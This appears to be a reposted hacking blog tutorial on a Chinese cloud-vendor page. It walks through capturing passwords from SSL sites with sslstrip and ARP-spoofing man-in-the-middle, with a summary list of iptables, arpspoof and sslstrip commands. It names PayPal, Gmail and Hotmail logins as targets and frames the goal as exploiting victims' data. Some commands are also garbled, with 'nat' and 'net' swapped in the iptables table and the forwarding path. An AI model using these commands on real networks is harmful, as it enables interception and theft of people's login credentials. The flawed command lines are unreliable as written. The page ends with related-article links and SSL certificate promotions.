Dumping ssl passwords with sslstrip

本文涉及的产品
公网NAT网关,每月750个小时 15CU
简介:

Well if you are looking to trap some ssl password sets or any site that use ssl to encrypt traffic here is a small tut to help you with that this uses a tool or script call sslstrip. What this tool does it strips the ssl encryption from the traffic leaving you with a simple flow of text base network traffic. Then we take it to the next level which is a hackers best friend a very old method of hacking the MITM attack this way we tunnel the traffic between the victim and the server or the web server. now that we have both combine to help us to gain passwords and logins to ssl based site we can do most anything with the date we collect from it weather it be just having fun or exploiting the information. so lets get hoping on how to do this

 

(1) setup the iptables with the command below

>> iptables -t net -A PREROUTING -P tcp –destination-port 80 -j REDIRECT –to-port 8080

(2) setup the forwarding of the the trafic

>> cat /proc/sys/nat/ipv4/ip_forward

** after running this command you would ether get a 0 or 1 if you have a one then you dont have to worry about the next command but if you have a 0 then you need to change the vaule by 1 the next command will help you change that.
>> echo “1″ /proc/sys/nat/ipv4/ip_forward

this command will change the vaule to 1

ok once you have these ready you need to setup the up arp poisoning set with this we will use arpspoof the commandline interface.

cmdline>> arpspoof -i eth0 -t [target_IP] [Attacker_IP]

** target_IP : is the ip address of the target computer you would like to attack
Attacker_IP : is the ip address you your computer or the computer you are going to use for the
attack.
** IP example: ————————————–
000.000.000.000
192.168.1.1
202.205.170.36
————————————

(3) Setup the strip for the MITM

now because we have arpspoof running and also because we have forward all incoming to where ever it was ment to go we are now in the middle of all the traffic also meaning that we can see everything that pass through both computer. so lets look at a traffic chart of what is happening.

——————–                                                           ————————-
-                       -     normal route                                 –                              -
-   VICTUM    – >>>>>>>>>>>>>>>>>>>>>> -  WEB-SERVER  -
- 192.1.1.10     -                                                             -            (SSL-en   -
-                      -                                                              -          200.1.1.12 -
——————-                                                             ———————–
#                                    ———————                                #
#                                    -                          –                               #
# ############>- ATTACKER    -<###########

MITM route – 192.1.1.20        -   MITM route
-                           -

———————-
//->arpspoof
//-> Ip_forwarding
//-> sslsrip

as seen in the diagram we see that since the attacker can see what is going through the line between the “VICTUM” and “WEBSERVER” he can do anything to you victum traffic even in put something to his traffic to the webserver but we are using sslstrip to strip the ssl encryption so that we can see the rough text password and username.

so what does sslstrip do for you well it actually preauthenticates you to the ssl server which means that the attacker authenticated for you meaning that your traffic from your computer if you are the victum is in clear text to the attacker. meaning that he can see every thing you are writing to the ssl server in clear readable text.

so now the command to make this happen is below

>> ./sslstrip.py -L 8080

once that is running the only thing the attacker needs to do is wait for you to goto a ssl site say paypal or hotmail or gmail or any service that host ssl support authentication.

once he thinks that he has waitted long enogh for data or somekind of log data to generate he will want to view the result.by default sslstrip generates a log file call sslstrip.log to view this file you can run the following command.

>>more sslstrip.log

now if it went well and if your victum login while you attack was going you should see some great stuff in your log file.

**********{summary commands}********************

———————————————————————————————–
1]  >> iptables -t net -A PREROUTING -P tcp –destination-port 80 -j REDIRECT –to-port 8080
2]  >> cat /proc/sys/nat/ipv4/ip_forward
3]  >> echo “1″ /proc/sys/nat/ipv4/ip_forward
4]  >> arpspoof -i eth0 -t [target_IP] [Attacker_IP]
5]  >> ./sslstrip.py -L 8080
6]  >> more sslstrip.log

———————————————————————————————-

ok hope you have learn something happy hacking













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/565116,如需转载请自行联系原作者

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
相关文章
|
网络安全
Defeating SSL using SSLStrip
http://securitytube.net/Defeating-SSL-using-SSLStrip-(Marlinspike-Blackhat)-video.
737 0
|
网络安全
Defeating SSL using SSLStrip (Marlinspike Blackhat)
http://securitytube.net/Defeating-SSL-using-SSLStrip-(Marlinspike-Blackhat)-video.
778 0
|
18天前
|
算法 安全 网络安全
阿里云SSL证书双11精选,WoSign SSL国产证书优惠
2024阿里云11.11金秋云创季活动火热进行中,活动月期间(2024年11月01日至11月30日)通过折扣、叠加优惠券等多种方式,阿里云WoSign SSL证书实现优惠价格新低,DV SSL证书220元/年起,助力中小企业轻松实现HTTPS加密,保障数据传输安全。
553 3
阿里云SSL证书双11精选,WoSign SSL国产证书优惠
|
24天前
|
算法 安全 数据建模
阿里云SSL证书限时优惠,WoSign DV证书220元/年起
2024年11月01日至11月30日,阿里云SSL证书限时优惠,部分证书产品新老同享75折起;阿里云用户通过完成个人或企业实名认证,还可领取不同额度的满减优惠券!通过优惠折扣、叠加满减优惠券等多种方式,阿里云WoSign SSL证书将实现优惠价格新低,DV SSL证书220元/年起!
600 5
阿里云SSL证书限时优惠,WoSign DV证书220元/年起
|
1月前
|
负载均衡 算法 网络安全
阿里云WoSign SSL证书申请指南_沃通SSL技术文档
阿里云平台WoSign品牌SSL证书是由阿里云合作伙伴沃通CA提供,上线阿里云平台以来,成为阿里云平台热销的国产品牌证书产品,用户在阿里云平台https://www.aliyun.com/product/cas 可直接下单购买WoSign SSL证书,快捷部署到阿里云产品中。
2252 8
阿里云WoSign SSL证书申请指南_沃通SSL技术文档
|
11天前
|
网络安全
给网站免费申请SSL证书
为网站申请免费SSL证书是提升安全性的关键步骤。本文简要介绍如何通过JoySSL申请并部署免费SSL证书,包括选择证书类型、提交申请、验证域名、下载及安装证书等步骤,同时提醒注意备份证书、定期检查状态和更新服务器配置。
|
15天前
|
存储 安全 网络安全
SSL网络安全证书,守护您的数字世界
SSL证书的应用场景广泛,它是保护网络通信安全的重要手段。无论是个人用户还是企业组织,都应该认识到SSL证书的重要性,并采取适当的措施来部署和使用SSL证书,以保护自己的数据和隐私不受侵害。
|
22天前
|
算法 数据建模 网络安全
阿里云SSL证书2024双11优惠,WoSign DV证书220元/年起
2024阿里云11.11金秋云创季火热进行中,活动月期间(2024年11月01日至11月30日),阿里云SSL证书限时优惠,部分证书产品新老同享75折起;通过优惠折扣、叠加满减优惠券等多种方式,阿里云WoSign SSL证书将实现优惠价格新低,DV SSL证书220元/年起。
583 5
|
21天前
|
网络协议 应用服务中间件 网络安全
2024阿里云免费版SSL证书申请流程,跟着教程一步步,非常简单!
2024年最新阿里云免费SSL证书申请流程,品牌为Digicert,每个阿里云账号可免费申请20张单域名证书,免费时长为3个月。申请流程包括登录数字证书管理服务控制台、创建证书、域名验证和下载证书。详情请参考阿里云官方页面。
266 2
|
29天前
|
数据建模 网络安全
阿里云申请SSL证书价格多少钱一年?免费版和付费版价格手动整理
阿里云SSL证书提供多种类型和品牌的证书选择,包括免费和付费选项。付费证书如WoSign单域名SSL证书238元/年,DigiCert通配符DV证书1500元/年,GlobalSign企业型1864元/年。免费证书由Digicert提供,有效期3个月,适用于单域名。更多详情见阿里云官网。
436 1
下一篇
无影云桌面